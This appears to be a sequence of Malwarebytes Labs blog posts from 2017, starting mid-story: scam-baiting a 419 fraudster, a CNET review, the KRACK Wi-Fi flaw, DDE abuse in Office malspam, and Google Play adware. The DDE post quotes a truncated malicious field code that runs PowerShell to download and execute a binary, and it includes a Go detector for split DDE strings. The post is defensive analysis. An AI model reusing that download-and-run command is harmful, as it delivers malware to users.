Sorry kid, you’re in goal. Do they have goalies in Quidditch? I have no idea. Imagine being given a broomstick but then being made to sit still in front of a flaming hoop or whatever. The point is, I’m going to score a cool 60 million dollars and a 13-year-old Quidditch prodigy. I’m about to become very wealthy, by which I mean, I’m about to become a money mule.

Now the game is afoot. It’s time to confuse things further by making it sound like I think I’m supposed to be sending him the 60 million. Also: #teamsnape or #teamdumbledore?

Snape or Dumbledore?

At the time I’m not sure if the above blows my not particularly stealthy cover, but a little under 24 hours later, it’s a faintly terse “get on with it” response complete with fake legal contact, and also a planting of the flag for Team Snape:

Team Snape

Actually, it’s more like “Yeah yeah whatever, Professor Snape, sure. Show me the money,” but we’re still wasting valuable scammer cycles. When they get a case of the snappy replies, there’s only one thing to do: ignore them for a while. Three days later he’s back and sounding a bit worried. Can’t have the cash boat sailing off into the distance!

Of course, I only went missing because I was busy doing a great job of redesigning the bedroom for my soon-to-be Quidditch superstar. Honest:

Train time

I thought he might have Googled Hogwarts Express here, but my luck holds out:

Transportation trouble

I left him hanging a little while longer. At this point, I’m not entirely sure who is doing the trolling:


To date, most of the accounts in use by “Mark” have been shut down and/or reported for spam, so it’s time to ease off on the Potter gas pedal and slowly cut him out of my life. I’m sorry, Mark: Your kids will never raise the Grand Wizard Cup in, uh, Quidditchbowl 2020 no matter how much you plead.


Tempting, but no. 419 scams are bad and you could get into legal trouble for becoming tangled up in one. Ignore, report, and delete.

Even when it sounds as cool as this:



The post 419 scammer offers USD $60 million—and a free child appeared first on Malwarebytes Labs.


Oct 18, 2017

When an “Outstanding” rating from CNET isn’t enough

The editors at respected tech site CNET recently awarded Malwarebytes for Windows an “outstanding” rating of 4.5 stars out of five. In the review, editor Tom McNamara recommended Malwarebytes because the scanning engine is of “high quality,” it works well with Windows 10, and it does a good job of explaining processes in plain English. Malwarebytes for Windows was one of the very few security programs to earn more than four stars from both the editors and CNET users.

CNET Malwarebytes Windows

So you’d expect that it would be champagne, fist bumps, and free kittens all around for a job well done here at Malwarebytes Galactic HQ.

Nope. All we can think about is that half star that we didn’t get. Perfection is hardcoded into our company DNA. It has to be.

Because, the way we figure it, a cybercriminal has to be right only once, on one computer, anywhere on this big spinning top of ours, in order to be successful. And cybercriminals are taking a lot of shots—our products detect approximately three million pieces of malware on millions of devices every day. Every day. Which essentially means our job is never done.

This is the brutal math that keeps us up at night: millions of devices to protect, zero successful malware attacks. So we’re constantly tinkering with the Malwarebytes technology to make it smarter. In fact, the next version of Malwarebytes for Windows, version 3.3, is just around the corner. It’s our best protection yet—and we set that bar very high.

Now don’t get us wrong: We’re thankful and humbled by CNET’s recognition. Four and a half stars means we’re doing a really fine job delivering a malware-free existence to our customers, but that remaining half star is on our minds, no doubt.

The post When an “Outstanding” rating from CNET isn’t enough appeared first on Malwarebytes Labs.


Oct 17, 2017

Release the KRACKen: flaw in Wi-Fi security leaves users vulnerable

A serious flaw in the wireless protocol that secures all modern protected Wi-Fi networks has been discovered.

How serious? If your device supports Wi-Fi, it is most likely affected. The attack, dubbed KRACK, is practical and abuses flaws in the design and implementation of the Wi-Fi standard itself, not of some specific hardware. KRACK, short for Key Reinstallation Attack, would allow a malicious actor within Wi-Fi range to insert themselves into the network and intercept traffic between the device and the router.

This means everyone using WPA2 (the protocol known as Wi-Fi Protected Access 2) could be impacted to some degree.

The degree of impact depends on multiple factors, but it ranges from traffic interception and decryption of encrypted data to injection of malicious traffic.

Android and Linux are especially vulnerable to this attack, as they can be tricked into reinstalling an all-zero encryption key, giving the attacker full visibility into the traffic.

The good

  • Attacks can be somewhat mitigated if the traffic is HTTPS.
  • Apple has already patched iOS, macOS, tvOS, and watchOS. Great if your device is current; not so great if it isn’t.
  • Maybe this will finally get outdated routers retired and current ones patched?
  • Attacks are stymied by VPN usage.
  • If you have automatic updates on Windows, a patch has already been pushed, with a caveat. Microsoft still recommends contacting your hardware vendor to see if updated drivers for your wireless adapter are available.
  • Mathy Vanhoef did responsible disclosure and withheld public disclosure until major players could create patches.

The bad

  • Android users, with their fractured landscape and poor patching availability, are at risk, some with no possible solution.
  • Some routers will never receive updated firmware, leaving them vulnerable forever. Updating the firmware on a router is beyond what the average user feels comfortable doing.
  • While HTTPS can mitigate some attacks, improper implementations on websites are common, and once your traffic is routing through a maliciously controlled “man-in-the-middle” router, you’re vulnerable to other traffic manipulation.
  • Expect KRACK to go from POC to practical deployment at the coffee shop very quickly. Remember Firesheep? WEP wardriving? Someone is bound to make an app that will dramatically lower the difficulty to exploit this.
  • This won’t be fixed fully until the Wi-Fi standard is changed.

What to do about it

  • Run updates on all your devices, systems, and software. If you don’t have automatic updates on your Windows machine, look out for the Microsoft patch, which was issued on October 10.
  • Android users: Keep your eyes peeled for updates from Google, which they said would be available in the coming weeks.
  • If you’ve got Apple products, sit tight for the next software update, which should include patches that the company has created for its beta versions of iOS, watchOS, tvOS, and macOS.
  • See if your router manufacturers have issued updated firmware that addresses this vulnerability and update as soon as possible. If not, you might consider replacing the router.
  • It is important to keep in mind that it’s not only individuals who are impacted by this vulnerability, but also businesses. Any Wi-Fi deployment that uses WPA2 can be exploited. This means organizations should also push updates and be sure remote workers are securing their devices and systems as well.

The post Release the KRACKen: flaw in Wi-Fi security leaves users vulnerable appeared first on Malwarebytes Labs.


Oct 17, 2017

Old MS Office feature weaponized in malspam attacks

There has been a lot of talk recently following a write-up and proof of concept about a Microsoft Office feature that can be misused and weaponized by malicious actors. The protocol, known as Dynamic Data Exchange (DDE), has actually been around for a long time, and allows applications to exchange data and send updates to each other. This feature can be used, for example, to refresh a cell in Excel with data coming from another program.

Now threat actors are using this feature to distribute malware without relying on macros or exploits.

Perhaps what makes this technique most interesting is the fact that malicious actors can craft booby-trapped documents void of any macro and still achieve code execution. Macros have been a favourite among spammers, but they are highly suspicious, and many system administrators have set up group policies to disable them completely. This is why cybercriminals seek out any other way to deliver malware via Office files.

In the case of the DDE method, no exploits are used. Instead, a social engineering technique is employed to entice users into clicking a prompt.

DDE was first used in some targeted attacks. It has now gone mainstream with the group behind Hancitor (the campaign was spotted by @James_inthe_box and the DDE use identified by @mesa_matt), who leveraged it in their latest spam campaign.

We can find where the malicious code is inserted by checking for any reference to DDE within the document’s code. Didier Stevens published a YARA rule for this very purpose, but it seems the miscreants evaded detection by splitting the string of interest:

The final code put together looks like this:

"DdE" c:\Windows\System32\cmd.exe " /k powershell.exe (New-Object System.Net.
'%TEMP%\tvs.exe');Start-Process '%TEMP%\tvs.exe'"

The rest of the attack is straightforward, with PowerShell downloading the malicious binary (Hancitor) to the %TEMP% folder and running it from there.
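A detection check for the split-string evasion described above, as an added example in Go (it is neither Didier Stevens’ YARA rule nor a document from the campaign): it reassembles the field code from the w:instrText runs of a constructed document.xml before looking for the DDE/DDEAUTO keyword, which a byte-level match on the raw XML misses.

```go
package main

import (
	"encoding/xml"
	"io"
	"regexp"
	"strings"
)

// Constructed document.xml fragment (not from a real sample): the field code is
// split across w:instrText runs, so "DDE" never appears contiguously in the raw XML.
const sampleDocumentXML = `<?xml version="1.0" encoding="UTF-8"?>
<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
<w:body><w:p>
<w:r><w:fldChar w:fldCharType="begin"/></w:r>
<w:r><w:instrText xml:space="preserve"> Dd</w:instrText></w:r>
<w:r><w:instrText xml:space="preserve">E c:\Windows\System32\cmd.exe </w:instrText></w:r>
<w:r><w:instrText xml:space="preserve">"/k powershell.exe ..."</w:instrText></w:r>
<w:r><w:fldChar w:fldCharType="end"/></w:r>
</w:p></w:body></w:document>`

// Matches the DDE and DDEAUTO field keywords, case-insensitively.
var ddeField = regexp.MustCompile(`(?i)\bDDE(AUTO)?\b`)

// naiveMatch is the byte-level check the split string evades: it searches the
// raw XML without reassembling the field code.
func naiveMatch(docXML string) bool { return ddeField.MatchString(docXML) }

// fieldCodes joins the text of every w:instrText run and collapses whitespace,
// so a field code split across runs is whole again.
func fieldCodes(docXML string) (string, error) {
	dec := xml.NewDecoder(strings.NewReader(docXML))
	var sb strings.Builder
	inInstr := false
	for {
		tok, err := dec.Token()
		if err == io.EOF {
			break
		} else if err != nil {
			return "", err
		}
		switch t := tok.(type) {
		case xml.StartElement:
			inInstr = t.Name.Local == "instrText"
		case xml.EndElement:
			inInstr = false
		case xml.CharData:
			if inInstr {
				sb.Write(t)
			}
		}
	}
	return strings.Join(strings.Fields(sb.String()), " "), nil
}

// detectDDE reports whether the reassembled field code contains a DDE field and
// returns the normalized code so an analyst can see what it would launch.
func detectDDE(docXML string) (bool, string, error) {
	code, err := fieldCodes(docXML)
	if err != nil {
		return false, "", err
	}
	return ddeField.MatchString(code), code, nil
}
```

Running detectDDE over a real document means unzipping the .docx and feeding it word/document.xml; the same reassembly applies to the other XML parts that can hold field codes.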

Office and malspam

Microsoft Office is being abused in both targeted and large-scale campaigns by malware authors who use a wide variety of techniques to execute malicious code. The DDE method is not new at all, but it is an example of how forgotten features can come back to haunt us.

Microsoft did not deem this a vulnerability, and so far has not decided to release a patch to render it harmless. One has to wonder how many people still use DDE for legitimate purposes, and whether retaining it is justified.

Malwarebytes users are already protected against this latest campaign and similar ones.

Indicators of compromise

Word document




The post Old MS Office feature weaponized in malspam attacks appeared first on Malwarebytes Labs.


Oct 17, 2017

Yet more mobile adware found in Google Play

Finding an adware variant that made its way past the Google Play store is out of the ordinary. So when two adware variants slip by in one week, we take notice. Last week, we added two new Ad SDKs to our growing list of adware detections—Adware.Solid and Adware.Cootek. Both Ad SDKs were found in an abundance of apps in Google Play. Adware.Cootek infects over 2,000 Play store apps alone, according to our Mobile Intelligence System.

Behaving badly

Both pieces of adware have remarkably similar traits, displaying full screen ads inside and outside of the infected running app. In addition, they both show ads during screen lock and immediately after unlocking the screen. For your viewing pleasure, below you can find an array of offending ads with captions detailing the inappropriate timing:


We’re listening

Ads displayed inside a free app? Fair game. Ads displayed outside the app, especially during and immediately after screen lock? That, my dear readers, is where we draw the line. Many of these apps contain reviews on Google Play addressing the aggressive nature of the ads contained. Unfortunately, these reviews fall on the deaf ears of the app developers. But fear not my friends, for we are listening. Whether it’s in Google Play or not, we take a hard stance on aggressive adware. Cue shameless (yet helpful) plug: Malwarebytes for Android warns you when Ads are crossing the line.

Use common sense

A note to app developers. We get that you need to make some revenue from your hard work, and selecting an appropriate Ad SDK to tack onto your apps is tough business. Perhaps it’s unfair to take the blame when, at the time the Ad SDK was selected, it wasn’t considered adware. However, I ask this question: How many bad reviews does it take before you repackage with another, less offensive, Ad SDK? One app we found, which will remain nameless, had around 400 one-star reviews, and I’m willing to bet most were addressing the aggressive ads. Think about how you’d like to interact with an app: would all of those aggressive ads make you enjoy the app even more, or would they frustrate you? Use common sense when selecting an Ad SDK.

It’s up to the user

As already addressed in our Mobile Menace Monday post, we know that mobile adware is not dangerous malware—more like an inconvenience. In some cases, it goes beyond annoyance when it collects too much personal information. This can include GPS location, phone number, IMEI, and IMSI. Still, this isn’t a blatant act of maliciousness as seen from far more threatening pieces of malware.

It’s fully up to you, the user, whether to delete the offending app or ignore our warnings. If you choose to ignore and accept the presence of these annoying ads and/or the potential to collect personal information, no further harm should come your way. Admittedly, we can’t fully guarantee this claim—thus, I leave you with this: Ignore at your own risk.

Unfortunately, we called it

When Google Play Protect was released, I conveyed my concern for adware along with other Potentially Unwanted Programs (PUPs) still making their way into the Play market. Unsurprisingly, here we are with two new pieces of adware found in one week. My prediction is that this is only the beginning. Stay safe out there!

The post Yet more mobile adware found in Google Play appeared first on Malwarebytes Labs.
